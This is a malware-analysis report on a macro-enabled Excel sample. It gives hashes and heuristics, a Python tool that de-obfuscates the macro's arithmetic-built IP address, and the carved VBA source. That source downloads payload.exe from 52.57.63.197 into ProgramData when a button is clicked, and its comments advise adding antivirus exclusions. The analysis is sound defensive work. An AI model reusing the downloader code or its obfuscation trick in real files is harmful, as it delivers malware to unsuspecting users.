Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 3cba9c33fc278e1e…

MALICIOUS

Office (OOXML)

Size: 158.3 KB
Created: 2015-06-05 18:19:34 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2021-09-15
MD5: 56d5800018d83c60050162bebe6654ce
SHA-1: a6ba6faa5c36483ad30743d18d7bdd33d1a56968
SHA-256: 3cba9c33fc278e1e1b1d8e433da4f90375e42fa2e0fc64cdde35e0787d3af7f9
Risk score: 88

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1105 Ingress Tool Transfer

The VBA macro declares urlmon!URLDownloadToFileA in Module1 and calls it from Sheet1.Button1_Click, so the download only fires when a user clicks the button. The URL is assembled at runtime rather than stored as a literal: the four octets are produced by arithmetic (50 + 2, Sqr(3249), Sqr(3969) and the constant 197) and concatenated with the & operator in the order C.B.D.A, which evaluates to 52.57.63.197. The download URL is therefore http://52.57.63.197/live-challenge/payload.exe, and the file is written as payload.exe in the directory named by Environ("ALLUSERSPROFILE") (normally C:\ProgramData). Module1 also declares kernel32!CreateProcessA with the STARTUPINFO and PROCESS_INFORMATION types, and Button1_Click initialises a STARTUPINFO, but no CreateProcessA call appears in the carved source: this stage downloads the second-stage executable to disk but does not itself run it. The macro's own comments describe it as the first part of a training challenge and advise adding AV exclusions; the verdict stands regardless, since a button-triggered download of an executable from a hard-coded (if obfuscated) IP address is malicious behaviour whatever the author's stated purpose.
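Because the IP address never appears as a literal, string-based scanners see only the "http://" prefix and the "/live-challenge/payload.exe" path; recovering the host requires evaluating the arithmetic with VBA semantics (in particular, the & operator converts a whole-valued Double such as Sqr(3249) to "57", not "57.0"). The following evaluator is an added example, not part of the original report or of any tool named on this page. It models only the VBA constructs this sample uses, the MACRO excerpt is copied from the carved macros.bas listing, and Environ() returns a %NAME% placeholder because the victim's real ALLUSERSPROFILE value is not knowable statically.

```python
"""Added example (not part of the original report): statically evaluates the IP-building
VBA above. Modelled: numeric/string literals, Sqr(), Environ(), + - * /, ( ) and &."""
import math
import operator
import re

# Button1_Click assignment lines copied from the carved macros.bas (constructed excerpt).
MACRO = r'''
    orwpRRemsn23235 = Environ("ALLUSERSPROFILE")
    orwpAAemsn23235 = 197
    orwpBBemsn23235 = Sqr(3249)
    orwpCCemsn23235 = 50 + 2
    orwpDDemsn23235 = Sqr(3969)
    orwpEEemsn23235 = orwpCCemsn23235 & "." & orwpBBemsn23235 & "." & orwpDDemsn23235 & "." & orwpAAemsn23235
    Ret = URLDownloadToFileA(0, "http://" & orwpEEemsn23235 & "/live-challenge/payload.exe", orwpRRemsn23235 & "\payload.exe", 0, 0)
'''

_TOKEN = re.compile(r'\s*(?:(?P<num>\d+(?:\.\d+)?)|(?P<str>"(?:[^"]|"")*")'
                    r'|(?P<id>[A-Za-z_]\w*)|(?P<op>&|[-+*/(),])|(?P<bad>\S))')
_BINOPS = {"+": operator.add, "-": operator.sub, "*": operator.mul, "/": operator.truediv}
_PREC = {"&": 1, "+": 2, "-": 2, "*": 3, "/": 3}  # VBA: arithmetic binds tighter than &


def vba_str(v):
    """CStr as VBA's & operator applies it: whole-valued Doubles print without '.0'."""
    return str(int(v)) if isinstance(v, float) and v.is_integer() else str(v)


class Evaluator:
    def __init__(self):
        self.vars, self.downloads = {}, []  # downloads: (url, local path) per call
        self.funcs = {"sqr": math.sqrt, "urldownloadtofilea": self._download,
                      "environ": lambda name: f"%{name}%"}  # victim's value unknown statically

    def _download(self, caller, url, path, reserved, callback):
        self.downloads.append((url, path))
        return 0.0  # S_OK, as the macro would see it in Ret

    def run(self, source):
        for line in source.splitlines():
            line = line.strip()
            if line and not line.startswith("'") and "=" in line:  # skip Dim lines, comments
                name, expr = line.split("=", 1)
                self.vars[name.strip().lower()] = self.eval(expr)
        return self

    def eval(self, expr):
        self.toks, self.i = [], 0
        for m in _TOKEN.finditer(expr):
            if m.lastgroup == "bad":
                raise ValueError(f"unsupported VBA syntax at {m.group().strip()!r}")
            self.toks.append((m.lastgroup, m.group(m.lastgroup)))
        value = self._expr()
        if self.i != len(self.toks):
            raise ValueError(f"trailing tokens after {value!r}")
        return value

    def _peek(self):
        return self.toks[self.i][1] if self.i < len(self.toks) else None

    def _take(self, *expected):
        kind, text = self.toks[self.i] if self.i < len(self.toks) else (None, None)
        if text is None or (expected and text not in expected):
            raise ValueError(f"expected {expected or 'a token'}, got {text!r}")
        self.i += 1
        return kind, text

    def _expr(self, min_prec=1):
        # Precedence climbing over the binary operators, left-associative.
        left = self._primary()
        while self._peek() in _PREC and _PREC[self._peek()] >= min_prec:
            op = self._take()[1]
            right = self._expr(_PREC[op] + 1)
            left = vba_str(left) + vba_str(right) if op == "&" else _BINOPS[op](left, right)
        return left

    def _primary(self):
        kind, text = self._take()
        if kind == "num":
            return float(text)  # the sample stores these in Double variables
        if kind == "str":
            return text[1:-1].replace('""', '"')
        if text == "(":
            inner = self._expr()
            self._take(")")
            return inner
        if kind != "id":
            raise ValueError(f"unexpected token {text!r}")
        if self._peek() != "(":
            return self.vars[text.lower()]  # KeyError: variable used before assignment
        self._take("(")
        args = [self._expr()]  # every function the sample calls takes >= 1 argument
        while self._take(",", ")")[1] == ",":
            args.append(self._expr())
        return self.funcs[text.lower()](*args)  # KeyError: function not modelled


def resolve_downloads(source=MACRO):
    """Return (url, local path) for each URLDownloadToFileA call reached in source."""
    return Evaluator().run(source).downloads
```

Running resolve_downloads() on the excerpt yields a single download of http://52.57.63.197/live-challenge/payload.exe to %ALLUSERSPROFILE%\payload.exe. The evaluator deliberately raises on any construct it does not model (a Len() call, an unknown variable, stray tokens) rather than guessing, so when it is pointed at a different macro the failure identifies exactly which obfuscation primitive has to be added next.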

Heuristics (3)

  • VBA project inside OOXML (medium; 2 related findings; rule OOXML_VBA)
    The document contains a VBA project (xl/vbaProject.bin); macros are present.
  • URLDownloadToFile in VBA (critical; rule OLE_VBA_DOWNLOAD)
    urlmon!URLDownloadToFileA is declared in Module1 and called from Sheet1.Button1_Click.
  • Environ() call, environment variable access (low; rule OLE_VBA_ENVIRON)
    Environ("ALLUSERSPROFILE") supplies the directory the downloaded payload is written to.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 3516 bytes
SHA-256: ea0632bca98e61da4e947944ac9821d6d3bebfabc9810b5a827e152b3396f600

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Button1_Click()

    'This is the first part of our challenge
    'Your first task is to discover the IP Address of a server from which the
    'following macro downloads payload.exe file
    'You will also need to get payload.exe file to complete further tasks
    'You might need to create some AV exclusions if this macro or payload.exe is detected as malicious

    Dim nm58937nnncbNMMr44 As STARTUPINFO
    Dim bnwer84903mndwoppeeeer As PROCESS_INFORMATION
    nm58937nnncbNMMr44.cb = Len(nm58937nnncbNMMr44)

    Dim orwpRRemsn23235 As String
    Dim orwpAAemsn23235 As Double
    Dim orwpBBemsn23235 As Double
    Dim orwpCCemsn23235 As Double
    Dim orwpDDemsn23235 As Double
    Dim orwpEEemsn23235 As String
    
    orwpRRemsn23235 = Environ("ALLUSERSPROFILE")
    
    orwpAAemsn23235 = 197
    orwpBBemsn23235 = Sqr(3249)
    orwpCCemsn23235 = 50 + 2
    orwpDDemsn23235 = Sqr(3969)
    
    orwpEEemsn23235 = orwpCCemsn23235 & "." & orwpBBemsn23235 & "." & orwpDDemsn23235 & "." & orwpAAemsn23235
    
    Ret = URLDownloadToFileA(0, "http://" & orwpEEemsn23235 & "/live-challenge/payload.exe", orwpRRemsn23235 & "\payload.exe", 0, 0)
       
End Sub



Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module1"
Declare PtrSafe Function CloseHandle Lib "kernel32" (ByVal handle As Long) As Long

Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" _
    (ByVal pCaller As Long, _
    ByVal szURL As String, _
    ByVal szFileName As String, _
    ByVal dwReserved As Long, _
    ByVal lpfnCB As Long) As Long
    
Declare PtrSafe Function CreateProcessA Lib "kernel32" _
    (ByVal lpApplicationName As String, _
    ByVal lpCommandLine As String, _
    lpProcessAttributes As Any, _
    lpThreadAttributes As Any, _
    ByVal bInheritHandles As Long, _
    ByVal dwCreationFlags As Long, _
    lpEnvironment As Any, _
    ByVal lpCurrentDriectory As String, _
    lpStartupInfo As STARTUPINFO, _
    lpProcessInformation As PROCESS_INFORMATION) As Long


Public Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

Public Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessID As Long
    dwThreadID As Long
End Type

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 26112 bytes
SHA-256: 563e345396078a6e2cbf918dae3afccac49ee9c36b47475728b67da7e322bb66